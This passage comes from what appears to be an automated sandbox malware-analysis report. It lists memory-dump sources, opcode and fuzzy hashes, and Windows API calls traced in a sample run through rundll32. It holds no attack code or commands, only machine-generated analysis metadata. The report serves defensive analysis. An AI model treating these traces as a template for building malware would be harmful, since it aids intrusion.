                    • Instruction Fuzzy Hash: 6A213A72A016108DDB54EFB5D58139E3760EB0079CF11242BFA0E27B99DB7AC8C9C788
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000013.00000002.4037054687.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.4037020653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037054687.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037511854.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037532425.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037550515.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037569932.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037592517.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037612543.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037636218.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037659218.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037683299.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037706260.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037729580.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037752301.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037779465.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037806065.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037835991.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037856601.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037888171.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037919205.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037948996.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037980210.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038010016.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038041302.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038074025.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038103894.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038127309.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038153160.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038181591.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038215144.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038246097.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038276865.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038311962.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038311962.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038380046.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038402647.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038436175.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038467761.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038497407.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038525830.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038555591.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038555591.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: File$View$CloseCreateCurrentHandleMappingProcessUnmap
                    • String ID:
                    • API String ID: 3559396350-0
                    • Opcode ID: c1b8913223bb6d67ca11dac591130d17c9fbfe597173d1045ad4f9b4300826e1
                    • Instruction ID: 8e748d1b53e11ccef3c0eb3844b99e526bf8a27556ab0dbc5ec00e588de23727
                    • Opcode Fuzzy Hash: c1b8913223bb6d67ca11dac591130d17c9fbfe597173d1045ad4f9b4300826e1
                    • Instruction Fuzzy Hash: 05510576201BC0C9EB70EF36D8997DE2761E75578CF80511AEA494BB99CFB8C684C384
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000013.00000002.4037054687.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.4037020653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037054687.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037511854.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037532425.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037550515.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037569932.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037592517.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037612543.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037636218.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037659218.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037683299.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037706260.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037729580.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037752301.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037779465.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037806065.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037835991.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037856601.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037888171.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037919205.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037948996.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037980210.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038010016.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038041302.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038074025.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038103894.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038127309.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038153160.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038181591.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038215144.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038246097.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038276865.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038311962.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038311962.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038380046.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038402647.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038436175.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038467761.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038497407.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038525830.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038555591.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038555591.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorFileLast$CloseCreateHandleTime
                    • String ID:
                    • API String ID: 1269242970-0
                    • Opcode ID: f95636084fb0cf0d0bf634a45240882383bfcb303348400ebd39aae63f895444
                    • Instruction ID: 39fea05b0fdc2f25c8a20a9dd337e5d150ca42227ecdd6d49064eb7cb99fe5a3
                    • Opcode Fuzzy Hash: f95636084fb0cf0d0bf634a45240882383bfcb303348400ebd39aae63f895444
                    • Instruction Fuzzy Hash: F2412932200B848DD760EF79E8653DA37A5F78579CF10821AEA9D4BB9ACF38C554D380
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000013.00000002.4037054687.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.4037020653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037054687.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037511854.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037532425.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037550515.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037569932.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037592517.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037612543.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037636218.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037659218.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037683299.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037706260.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037729580.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037752301.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037779465.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037806065.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037835991.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037856601.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037888171.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037919205.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037948996.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037980210.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038010016.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038041302.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038074025.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038103894.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038127309.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038153160.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038181591.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038215144.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038246097.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038276865.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038311962.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038311962.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038380046.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038402647.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038436175.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038467761.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038497407.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038525830.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038555591.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038555591.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: AttributesErrorFileLast
                    • String ID:
                    • API String ID: 1799206407-0
                    • Opcode ID: 059e28204f9a91e66119d42c3387b1ab58e7ceed50ac14e4cf9be365d9a5ca95
                    • Instruction ID: c5a4fe3489037ea804c00f5422208fa66f2308ca377aeb35cea8b5e0c8ade501
                    • Opcode Fuzzy Hash: 059e28204f9a91e66119d42c3387b1ab58e7ceed50ac14e4cf9be365d9a5ca95
                    • Instruction Fuzzy Hash: 39117AB120410320EE28693756243BB09024F8D3F8F2AB627EE6A873E4C63CC4469E1D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetLastError.KERNEL32 ref: 005115CB
                      • Part of subcall function 00436300: CreateFileW.KERNEL32 ref: 00436369
                    • GetLastError.KERNEL32 ref: 00511666
                      • Part of subcall function 0043EA00: FormatMessageW.KERNEL32(?,?,?,?,?,?,00511679), ref: 0043EA5D
                      • Part of subcall function 0043EA00: LocalFree.KERNEL32(?,?,?,?,?,?,00511679), ref: 0043EAA6
                    Strings
                    Memory Dump Source
                    • Source File: 00000013.00000002.4037054687.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.4037020653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037054687.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037511854.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037532425.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037550515.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037569932.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037592517.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037612543.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037636218.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037659218.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037683299.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037706260.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037729580.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037752301.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037779465.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037806065.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037835991.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037856601.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037888171.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037919205.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037948996.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037980210.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038010016.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038041302.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038074025.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038103894.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038127309.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038153160.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038181591.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038215144.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038246097.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038276865.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038311962.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038311962.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038380046.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038402647.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038436175.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038467761.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038497407.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038525830.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038555591.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038555591.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorLast$CreateFileFormatFreeLocalMessage
                    • String ID: XLM$5B
                    • API String ID: 3390516113-4037079664
                    • Opcode ID: 667392af4be657af5266e6cce04edf336da9085f6fcf5a3f90d6d1f32072e8dc
                    • Instruction ID: 9b238616e6485af7c83a0d925af92c9e45f4d60ad68d559227fbd5342f7d0e30
                    • Opcode Fuzzy Hash: 667392af4be657af5266e6cce04edf336da9085f6fcf5a3f90d6d1f32072e8dc
                    • Instruction Fuzzy Hash: 05511522101BC488EB20EF76D8903D93B62F78579CF50421AEB5D4BB9ADF74C688C385
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetThreadUILanguage.KERNEL32 ref: 004145B9
                    • SetThreadPreferredUILanguages.KERNEL32 ref: 00414634
                    • SetThreadPreferredUILanguages.KERNEL32 ref: 004146A0
                    • SetThreadPreferredUILanguages.KERNEL32 ref: 004146E0
                      • Part of subcall function 00414540: GetThreadPreferredUILanguages.KERNEL32 ref: 00414565
                      • Part of subcall function 00414540: GetThreadPreferredUILanguages.KERNEL32 ref: 0041458E
                    Memory Dump Source
                    • Source File: 00000013.00000002.4037054687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.4037020653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037054687.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037511854.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037532425.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037550515.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037569932.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037592517.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037612543.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037636218.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037659218.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037683299.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037706260.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037729580.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037752301.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037779465.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037806065.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037835991.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037856601.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037888171.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037919205.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037948996.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037980210.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038010016.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038041302.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038074025.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038103894.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038127309.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038153160.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038181591.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038215144.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038246097.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038276865.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038311962.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038311962.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038380046.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038402647.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038436175.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038467761.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038497407.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038525830.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038555591.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038555591.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: Thread$LanguagesPreferred$Language
                    • String ID:
                    • API String ID: 2255706666-0
                    • Opcode ID: 2b226cebd2c2f178f8fb8eecb07d43c99173cca05a335e053b410a15d8c7619d
                    • Instruction ID: 57eada3b38194d7b08bb3a3721538a05868af864e37c8cd442cfa6c9d7bf3455
                    • Opcode Fuzzy Hash: 2b226cebd2c2f178f8fb8eecb07d43c99173cca05a335e053b410a15d8c7619d
                    • Instruction Fuzzy Hash: 0F31B0723015609ADB58DF36DA543EA2762EB84BDCF446126FA0A47B58EF7CC8C5C344
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 00436960: GetFileAttributesW.KERNEL32 ref: 00436979
                    • GetVolumeInformationW.KERNEL32 ref: 0043657C
                    • GetDriveTypeW.KERNEL32 ref: 004365D7
                      • Part of subcall function 00436880: GetFileAttributesW.KERNEL32 ref: 0043689F
                    Strings
                    Memory Dump Source
                    • Source File: 00000013.00000002.4037054687.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.4037020653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037054687.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037511854.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037532425.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037550515.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037569932.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037592517.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037612543.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037636218.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037659218.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037683299.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037706260.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037729580.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037752301.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037779465.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037806065.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
